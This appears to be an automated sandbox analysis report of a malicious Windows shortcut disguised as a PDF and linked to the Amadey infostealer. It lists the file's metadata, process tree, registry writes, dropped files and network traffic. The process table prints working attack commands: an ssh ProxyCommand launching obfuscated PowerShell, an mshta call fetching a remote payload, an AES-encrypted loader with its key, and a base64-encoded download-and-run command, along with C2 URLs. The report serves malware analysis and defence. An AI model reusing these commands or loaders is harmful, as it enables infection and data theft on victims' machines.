File name: | Instruction_695-18121-002_Rev.PDF.lnk |
Full analysis: | https://app.any.run/tasks/11a68474-4e9a-4070-9b23-b8d244c9fc02 |
Verdict: | Malicious activity |
Threats: | Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks. |
Analysis date: | December 04, 2024, 18:51:43 |
OS: | Windows 10 Professional (build: 19045, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-ms-shortcut |
File info: | MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles%\Microsoft\Edge\Application\msedge.exe", length=0, window=showminnoactive, IDListSize 0x018b, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\" |
MD5: | A3CF7C78D143162733C64741467B5B90 |
SHA1: | 2E46AE7501BF5921802C4E122FEA038332D61741 |
SHA256: | 39FCF6143A801DE8ACBA009EF69AC4F7B533D8E1B91337547CA578F2B7117534 |
SSDEEP: | 24:8N8PZsx/Tfff//YK/Urrt1v+/+GnWbUk9r9AAlnE3ek489+ddS9dbEQWhWUIeFIU:87TXvYKKLGnaUk9Jm3ekJ9+do9aQv5W |
.lnk | | | Windows Shortcut (100) |
---|
IconFileName: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe |
---|---|
CommandLineArguments: | -o ProxyCommand="powershell powershell -Command ('m]]]]]]]s]]]]]]h]]]]]]]ta]]]]]]].]]]]]ex]]]]]]e]]]]]] h]]]]]]]ttp]]]]]s:]]]]]]/]]]]]/]]]]]]]b]]]]]]]e]]]]]]r]]]]]]b]]]]]].fi]]]]]]]tn]]]]]e]]]]]]ssc]]]]]]l]]]]]u]]]]]]b]]]]]]-f]]]]]]ilm]]]]]]]fa]]]]]]na]]]]]]]t]]]]]ic]]]]]]s.]]]]]]]c]]]]]]]o]]]]]]]m]]]]]]]/]]]]]z.mp]]]]]]]4' -replace ']')" . |
RelativePath: | ..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe |
Description: | Adobe PDF Document |
TargetFileDOSName: | ssh.exe |
HotKey: | (none) |
RunWindow: | Show Minimized No Activate |
IconIndex: | 11 |
TargetFileSize: | - |
FileAttributes: | (none) |
Flags: | IDList, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
6240 | "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]]s]]]]]]h]]]]]]]ta]]]]]]].]]]]]ex]]]]]]e]]]]]] h]]]]]]]ttp]]]]]s:]]]]]]/]]]]]/]]]]]]]b]]]]]]]e]]]]]]r]]]]]]b]]]]]].fi]]]]]]]tn]]]]]e]]]]]]ssc]]]]]]l]]]]]u]]]]]]b]]]]]]-f]]]]]]ilm]]]]]]]fa]]]]]]na]]]]]]]t]]]]]ic]]]]]]s.]]]]]]]c]]]]]]]o]]]]]]]m]]]]]]]/]]]]]z.mp]]]]]]]4' -replace ']')" . | C:\Windows\System32\OpenSSH\ssh.exe | — | explorer.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 255 Version: 8.1.0.1 Modules
| |||||||||||||||
6248 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | ssh.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6332 | powershell powershell -Command ('m]]]]]]]s]]]]]]h]]]]]]]ta]]]]]]].]]]]]ex]]]]]]e]]]]]] h]]]]]]]ttp]]]]]s:]]]]]]/]]]]]/]]]]]]]b]]]]]]]e]]]]]]r]]]]]]b]]]]]].fi]]]]]]]tn]]]]]e]]]]]]ssc]]]]]]l]]]]]u]]]]]]b]]]]]]-f]]]]]]ilm]]]]]]]fa]]]]]]na]]]]]]]t]]]]]ic]]]]]]s.]]]]]]]c]]]]]]]o]]]]]]]m]]]]]]]/]]]]]z.mp]]]]]]]4' -replace ']') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | ssh.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6660 | "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://berb.fitnessclub-filmfanatics.com/z.mp4" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
7072 | "C:\WINDOWS\system32\mshta.exe" https://berb.fitnessclub-filmfanatics.com/z.mp4 | C:\Windows\System32\mshta.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6172 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function EhNo($fVNOW){return -split ($fVNOW -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$mbaO = EhNo('C38A8314C6D512DB74485356BE39888EE9925C2281B41A870A93C8B2D5D640A69C1B84FB174E3857338A3F29B0BC201CBAE4C0E078A084FEAB36D6E5C129923577A943A7B7B9E80CD4B717B35AB910C6E3B0FA9A865CF551A2DC2ADFCFF3EBB21EBD7DEDD60EDC13026C153388485FDF1AC35BC0468A5C535651DF2806D21D4018C2A7B7E992A43E2DABB65D2351BD518D491BBBB8DF843C260A441F6A53C1EFBDAF7229D9FAE26FC27F5B05D380BC26CA0FEBDD5BA5A0EB82A1E7F9A938B5ED11EDFE83733EE5BD9B41842A66B0AED9471AA6556BF7D0C653E7003B7FA9B58B38490B6F52DF4A87D2B53F600A141D60A19DC2AA34A224EF47C6DF92B8DB56263E9C7F55EE4158FAD446B242313DDB8BF39449DB89BC72D11A11652EF4DFEFD667902331EA74794B6A67B4CDD5ACA8760D9FFD3767A211C0FA243363A1BD5BB01FCA17D6ABD4E3641CB89FE09848FC0B87C1682BD406B1FFB48111D826BF42319F86EDDF54EF392181D1835103092BD65F468D5CD7509428F489C18C9ED716C0826433468E3DC8CAC68FE4C8E73D4A7AF24E20E29CE8BC747E51C7D60211D1D9108A36E9ED5894EC918826DD0D2BA213C9CBEAED248628920C4034A6A1AC220514DD10F6495B697AB9FA5D222FF857B08914A98EF2F41EEB2A13FB672CF5121AA56B9700672AC61423E329F5BE09D7E42A8F5E7472B06B08ED17223AD27AB1FDCD50AEE7A03C7752206D59395E1E657839378114582CE5288A87307A61F294B3A99AC37DCCD3C76F9B7C1EB5B34A5AF3ADDEB53175C886FD46CD841BCCAEC99CEB11DA016155A428190129B6CD87EFFECA8E9B27B519708ED1C4B71E4854A661A036B6CBE8BD2751B09AC153946351DD8D6D3E057C12BAB88D69DD739087AF882D851CE6D6E1E28A9622113D283879B560AC3C94753656293B30A504C24C3B832C6B0F7F82A720EEBFE712E1B11CD932C9E5C7D456C06867A74AD3A97F905CED36247B87F0625B42F75BA4945635B18A82EDF26E5861C329BFEADAF94CA576635764882B1CD7A6E75D104129FC224EBFBEB94A628CEA56F0A3828F40710143735DA31B592516964E704BB489E450292571ED1B8EE1F001AE77C6FC25B2078E74A31D038E1D03ACCA3C7C6A8FAB337C633522A66604A1BB8B9C555E3BBE6348CE9B111D471D213702C17F614C86FBF8FE91B3781D35DF5B128CC95ED1667145FE3B243E6951A9455CAEC033289D883DFB031E516E037E4A4668162AD2AD1D871E1870AFCE9730FA836626E94F80307146B75CF9E7AC57BC4DC6ADAC9FBAE30D68030AE39A44BC038FC72594DAE859A181023D142321D6A31CB9F0B84D661BEC72BF3124F1B60880A358FE25760E1BD0A0F6392FB0747B86C767385A6E06D6207459916C16AECB2F1F5BD994DB8CA214ECFE96CB37CA7850202770519A107DC62590038A540A914AFE664965B27756163566BE349ED77E33B9B52EB99797311123C2913E9DDAC39EB6ECFF220A911F4CBA4BBCA42E3EFE5F7A92756B074DA2DEB89D425B04034B270C25948C41781E22C34A0F380A6C22935256D47847BB6239FAF39D9D1FC1EA9D6E43EFCFB896C1D8816DD34CD7F6D433DB2ABBA7DDC692858222F86A44530FDDF5153E885D5B67441D8C8252EE75CA3C4D9808383692638135E3551937B256F7773F54A85E36840866A5B362F59589DED49A08715A66E8242C25BFAF5F34CD1E1C54FC418EADDDF6E597A520EE2A3D0436285A094388DF2F75DC594B5562E58F69BA6B5EC4606185875510834C2B4E4D185598FA71136E84C07D63A81B60FC526FCFCDC2687FB8F2A82163A586B78C9EF88F7BAAE26CFDC354883E02A310DCEFD9A626F0DC7297EB531ABE66B7A5C983397F08D52E357D101CC123AD37EA8123CD23FBB08BD4714C8F0417A9FC433BB55A6E1D2AF00F7A078FE782C81F40749B962591E8E2D5F71F36954FA29E50B541460253DDD47F8D68ADEC9363D782DED5421500BF4FBEE25A669215CB1C1CF9C4E39B42F859E459433536EBB2907989E1A5FC589691387EDB08362925BE79E141A8B621176532558D159FD2B1181F898AA05EEB1EA07A556D6526ACFF59D0D02B5A98F70D6AD20CB5BC07B4752386DCD6CC47CB918CA4AB8B27B8CD3B4ADEE286293420BA6F189987D8E71654846F001ADDA03742803420074C99A7E173A3AF1F07E40C7289919C5405C1BF8A5353A0076DB1E95557A94F9DD0AA6F83884FFA5DE3D8C61567935876B1F332ACB612F634FCAC6BA6072C8BE5661D6B0F2A165601A8CBF9F9DF3F753391F622DB6D5EAC28EEB76EBC8DD9D2F9B58AD024D91420FB02E416BF9CB1115FA4DE78D8634C0977354A5A3528B042F835A34E3B2AA719E59E38CC1C23AE866E10F0F6A1B75704280DB282B9F28720319946E2E42C1C71CB3CE37440E9AC836574DE323A1EE86F3FE448C5BCC423F5F8511F71FAFFCFC235341AF3D1E03B2D48457B15F12ABEBCB12BBF7D97FAE4E57BBD065FE92EAE2804E5A4CB23F8F63844CC023F22B67826B6F5D371262B7CB12B4DD1866657D6802B8BA8F65FEEF4565467CC239F917D93AAF7BE92EFCF3FCDB41866DA32FA7B3920D92A5187C3071762FD5B90058D2A5886857BBBFC1641257F8DF51B742E0D36775465ED3059DF960AA9CE6EA17442B78E7D79CCCF6C68F3A5106F7FA91081B616E536F3C9CE9FABA62C617DB84DEA248D21129E121AC109AC1F445C0489236B29800278CE4C44AAD96EC5A84896CE52146759758532CF0EDAAF5543CAE8091A5D93E45B0489408B3933747118015539E6D2A113E6E38BBCFDBB0C4F67C4F3B9085DEAE9478F58BA64392AB67EEF40B9CDAE975CBB60252F0683FBCD6DA3213FDF689E2EC1960A3842A6DBF718CC1FB567208847E41ECB7196F3CEBE8DA67E076CF9A78D99615A6AC5376D392816D30EC3EE11E891E380AF759932052BDAD62EBAAC8A637E4C0D8E78C05F7A5292076253BC4CC8764E55D595B0A901D5F0B12D1A41B183C5DA19A74BF50D22AE7E3C3F2DC7F99B740ACF26474319680DD6305577E584D9E445067EAFF8A5FE2FFD6722D48DBD50DA9391B1E40040D72ACFD3BAFB31E573428D9A562C36830221B3FF269656E0404B04B67712ECD9A11BE2B987725683494DFBCE427CFD4B1BC13B39A1DB3364671E654F56583E1155DCCE223ADCADC21B4CFB556679B5F6413FA8E33733AC785B00BFA5085E98931898DBC97044D2831337E76508662A8F067D7A4BA9E9800685A75793E895A3E25CEBF048DA05042A904C68D3DB385A07DB95058B0339750373030ABBB0AFA8F5701AFEDDFF97243B2AA2B201452F0D179D0098D775594E469D720050081AE8A2D326F8DC507DA60618DF27FCA45C101E8B651BEE7BB35CAC6FC05F6D8D0260EE5937D0627215D14CD6F415DBDA14A23923355B710E74518171C7AB2FBF67F6E89936F33643ED072D9048B1F470D499E2269D10C4BDA3D2E036ACCEA500CEFE7B6EB2CAACA113FC36D16F917ED9BB4D740F7E41D660E15D2463EA1581C42EC6919DC1E0A780A804BCF0E7FC2AE44182EB42885D55707E32B6D71AA993BE51EAC6D7513934C870B45F0321715A29B15AD8202C074C26148ADE61ED65D21DA94F7EF5CB616C7CA5608F6354EE8B744187BEC5261B209A162E278E3B4F9D1972618759D7555C844659AC6967C78FF1B9CD0AC814EA9EF977A4760D79CDCF97A7761C23DA11D1A5CB64CADE2438719A27A3698D8838794C22809194A8649C262D4E425E84F154F6A45FC8194C9ACFDE794A4CE529562EB7F69BE5DD7637F7D7042943FB3B1DCD77A2754C765AEA874B32A2FDE6445315340AE7A630E204AA9CD2F73EF8E2C8C9CAACF9D1BDA533898FE02AC3F1A6E48CCCDF779D4D53DEAA17B40D403E87A70307F16A4B0EDED94522FC0B4BA5F4D69FD381C16E3D7ABE7F4FD4401920E00BD04985980FCE3FF2F4A011D067AF739ACCFF58A224C866E599F3AC5B49676E01AAC90B973C65C9F01103773D2D8C133ADBE06005041C7C109F8C66189516CBA309737FEDC751C4F604DF4693F58F66913EEE3B038035C1D378A896E499A097E3D58E2F155EF1EE0506B7B8D1A8F18A1A1A716FB7285164D8C43BC1BAA8E98F871AC05C4E24E0A7F1A3993C7169988348083581A931B0C5592E1A3CF20DBCF3863E0E76899710846AF92240621AE31CDB4920925B19B1B07C1D46518248B4D468F4DA7F5D927B04C9BE7294204DDB4652AA452003777F5A3D80EBC42403A3AD15968985046D2E4F47B912D57D5EB899EA9FA0E6694AEFEAAC0F74DF287B54DC5CBD3E3DD891ADF810B6B87075F3CF10C2453528E504E6031E48ECD4E32186B8288C916309C2F3DCFC21E4B460631C73032BBA0AA67B4862C43E4D2454A966D0EEC1D04CD5AD4CC93054B2DE87E25838794ED1F0D11F8BE4EE03D51AD54BA97622534A0116CF79240F6A875E32BEEBF8A63DB83C15492DC24402AD6F208ABC2B5D989467A41D99C8E2300B856B4F5BEFED2EBB87E453FA20A04332FE49B5D249349EB1C6F4C58D68436B04991FDC6146D4E5A4237181E91CC5FBDCD42D75F303F5FC7645670A01FBC67B3B2FB783C4BCF4531734E41CB91B3922683EAC815AC5D6BDA0DDE1F5AA1D854D3CCDB657A7BD10ABD7849EA8463695D4BF1BC5BF54D9DD96BD5C4ED2BCBC536F84874F4DE4D51A607B7F9323F3810D8F1C577884F5E3AEB489DEB99828A96B20316FC0E52F0532D61640DD20E864C91F7F9509080F57DFCDAFB9B001F39FA155ADC3CB62052E2D0B79AB0C7BC932A00900DAD44BE231A095CA9FFCAD9CB574708825CCC56E8B08BB00D88466F8F6AE6585EB08EC24FBA6457E95ACD19CB3895B9E4AFB241F1A8AEDCABBD06F61042EFD60A6C48FC87301CBF951B7C1A1FD9BD8F5A8DBD97AB57CF3D376BA65C822D9D9DA725E615BB9CAC5C3B8325C73C4DB8F8F7C4F3FCE984B1B1EADF24A839E953B914717B4761F0F37DA59CF7B7D9AB1AF204D92364E0FBF747A8CB454B34AFD4D40846BE837344A7B6C733B2FA42B4B0F96FC8FF8ED0EAFFA5F3C2DA522885C45067384');$oPMoB=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((EhNo('52786B594D45786F66546252646B4F6D')),[byte[]]::new(16)).TransformFinalBlock($mbaO,0,$mbaO.Length)); & $oPMoB.Substring(0,3) $oPMoB.Substring(186) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6164 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
732 | "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -ExecutionPolicy RemoteSigned -Enc IAAgACAAWwBOAEUAVAAuAHMAZQByAFYASQBDAGUAcABvAGkAbgB0AE0AYQBOAGEAZwBFAHIAXQA6ADoAUwBlAEMAdQByAEkAVAB5AFAAUgBPAFQATwBDAG8ATAAgAAkACQA9ACAACQBbAE4AZQB0AC4AcwBFAGMAdQBSAGkAdABZAHAAUgBPAFQATwBjAG8ATABUAFkAcABFAF0AOgA6AFQAbABzACwAIAAgAFsAbgBlAFQALgBzAEUAQwBVAHIASQBUAHkAUABSAE8AVABPAEMATwBMAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAxACwAIAAJAFsAbgBlAFQALgBzAGUAQwBVAFIAaQB0AHkAUABSAE8AVABPAEMATwBsAFQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACwAIAAJAFsAbgBlAHQALgBzAEUAQwB1AHIAaQB0AHkAcABSAG8AVABvAGMAbwBsAHQAeQBwAEUAXQA6ADoAUwBzAGwAMwAgACAAOwAgAAkAIABbAG4ARQBUAC4AUwBFAHIAVgBpAEMARQBQAG8AaQBuAFQATQBBAE4AYQBnAGUAUgBdADoAOgBTAGUAQwBVAFIAaQB0AHkAUAByAE8AdABPAGMAbwBsACAACQA9ACAACQAJACcAVABsAHMALAAgAAkAVABsAHMAMQAxACwAIAAgAAkAVABsAHMAMQAyACwAIAAJAFMAcwBsADMAJwAgACAACQA7ACAAIAAJAGkAZQB4ACgAIAAgACAASQB3AHIAIAAJAAkAKABbAGMAaABhAFIAXQAgACAACQAwAFgANgA4ACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAEgAYQBSAF0AIAAgAAkAMABYADcANAAgACAACQAgACAACQArACAAIAAJAFsAQwBoAEEAcgBdACAAIAAJADAAWAA3ADQAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMASABBAFIAXQAgACAACQAwAHgANwAwACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAEgAQQBSAF0AIAAgAAkAMAB4ADcAMwAgACAACQAgACAACQArACAAIAAJAFsAYwBIAGEAcgBdACAAIAAJADAAWAAzAEEAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABhAFIAXQAgACAACQAwAHgAMgBGACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAGgAQQBSAF0AIAAgAAkAMABYADIARgAgACAACQAgACAACQArACAAIAAJAFsAYwBoAEEAcgBdACAAIAAJADAAWAA3ADAAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMASABBAHIAXQAgACAACQAwAHgANgAxACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAYQByAF0AIAAgAAkAMAB4ADcAMwAgACAACQAgACAACQArACAAIAAJAFsAQwBIAEEAUgBdACAAIAAJADAAWAA3ADQAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABBAHIAXQAgACAACQAwAHgANgA1ACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAQQByAF0AIAAgAAkAMABYADYAMgAgACAACQAgACAACQArACAAIAAJAFsAQwBoAGEAcgBdACAAIAAJADAAWAA2ADkAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABhAFIAXQAgACAACQAwAHgANgBFACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAEgAQQByAF0AIAAgAAkAMABYADIARQAgACAACQAgACAACQArACAAIAAJAFsAYwBoAEEAUgBdACAAIAAJADAAeAA2ADMAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABhAHIAXQAgACAACQAwAHgANgBGACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAQQByAF0AIAAgAAkAMAB4ADYARAAgACAACQAgACAACQArACAAIAAJAFsAQwBoAEEAUgBdACAAIAAJADAAeAAyAEYAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABhAFIAXQAgACAACQAwAFgANwAyACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAGgAQQByAF0AIAAgAAkAMAB4ADYAMQAgACAACQAgACAACQArACAAIAAJAFsAQwBoAEEAUgBdACAAIAAJADAAeAA3ADcAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMAaABhAFIAXQAgACAACQAwAHgAMgBGACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAEgAYQByAF0AIAAgAAkAMAB4ADMAMAAgACAACQAgACAACQArACAAIAAJAFsAYwBIAEEAcgBdACAAIAAJADAAWAA3ADYAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMAaABBAFIAXQAgACAACQAwAFgAMwA2ACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAEgAQQBSAF0AIAAgAAkAMABYADUANgAgACAACQAgACAACQArACAAIAAJAFsAQwBoAGEAcgBdACAAIAAJADAAeAA2ADgAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABBAFIAXQAgACAACQAwAFgANwA2ACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAGgAYQBSAF0AIAAgAAkAMABYADcAMAAgACAACQAgACAACQArACAAIAAJAFsAYwBoAGEAcgBdACAAIAAJADAAeAA2ADIAIAAgAAkAKQApAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
3508 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6432 | "C:\Users\admin\AppData\Local\c05faefa-d853-4462-ba71-f37c56627d5c\R-Viewer.exe" | C:\Users\admin\AppData\Local\c05faefa-d853-4462-ba71-f37c56627d5c\R-Viewer.exe | powershell.exe | ||||||||||||
User: admin Company: R-Tools Technology Inc. Integrity Level: MEDIUM Description: R-Viewer Exit code: 0 Version: 1, 1, 0, 0 Modules
|
(PID) Process: | (7072) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
Operation: | write | Name: | CachePrefix |
Value: | |||
(PID) Process: | (7072) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
(PID) Process: | (7072) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
(PID) Process: | (732) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached |
Operation: | write | Name: | {2781761E-28E0-4109-99FE-B9D127C57AFE} {56FFCC30-D398-11D0-B2AE-00A0C908FA49} 0xFFFF |
Value: 01000000000000007F7849A27D46DB01 | |||
(PID) Process: | (5316) dllhost.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer |
Operation: | write | Name: | SlowContextMenuEntries |
Value: 6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000 | |||
(PID) Process: | (4816) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
(PID) Process: | (4816) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
(PID) Process: | (4816) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
(PID) Process: | (4816) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | FileTracingMask |
Value: | |||
(PID) Process: | (4816) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | ConsoleTracingMask |
Value: |
PID | Process | Filename | Type | |
---|---|---|---|---|
7072 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8 | der | |
MD5:971C514F84BBA0785F80AA1C23EDFD79 | SHA256:F157ED17FCAF8837FA82F8B69973848C9B10A02636848F995698212A08F31895 | |||
6332 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kjouub2m.c20.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
6660 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_e4ll0wia.eby.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
6332 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5u02kfe5.mnq.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
6660 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mlutv3sf.vbe.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
7072 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8 | binary | |
MD5:017F37A5585B8DCFDA34E5A6809903BC | SHA256:70E8B8B97C281FDA26C95D89E787E9DDC59E016F2751DC07B5790D206F396708 | |||
7072 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\z[1].mp4 | text | |
MD5:581AC1AC39C1DB67986949DD1A88E596 | SHA256:850FE5FCA552CD8EEC40AFD88B540C25395D892A2D21553AF1BF0BBB5B019CF8 | |||
732 | powershell.exe | C:\Users\admin\AppData\Local\c05faefa-d853-4462-ba71-f37c56627d5c\_xlsx.dll | executable | |
MD5:74397528351ECF67517B7FC3B9278648 | SHA256:CA260F024587AE1FDE8F8E17585078DF81FDA26B95D1CEF168731062A5F9C001 | |||
732 | powershell.exe | C:\Users\admin\AppData\Local\c05faefa-d853-4462-ba71-f37c56627d5c\_wv2.dll | executable | |
MD5:DA04A070869B9FE12B6734C552904BC6 | SHA256:F0DF451DD298CD459BB08D3D6A316B583D70BC5D9E8D583F0EA7CA6FFD95C175 | |||
732 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jw53d5k4.jho.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
5064 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | — | — | whitelisted |
3416 | svchost.exe | GET | 200 | 69.192.161.161:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
3416 | svchost.exe | GET | 200 | 184.24.77.37:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5696 | explorer.exe | POST | 200 | 104.21.26.41:80 | http://connect.resourcecloud.shop/pLQvfD4d5/index.php | unknown | — | — | malicious |
6500 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | — | — | whitelisted |
7072 | mshta.exe | GET | 200 | 142.250.186.67:80 | http://c.pki.goog/r/gsr1.crl | unknown | — | — | whitelisted |
5696 | explorer.exe | POST | 200 | 104.21.26.41:80 | http://connect.resourcecloud.shop/pLQvfD4d5/index.php | unknown | — | — | malicious |
6808 | SIHClient.exe | GET | 200 | 69.192.161.161:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
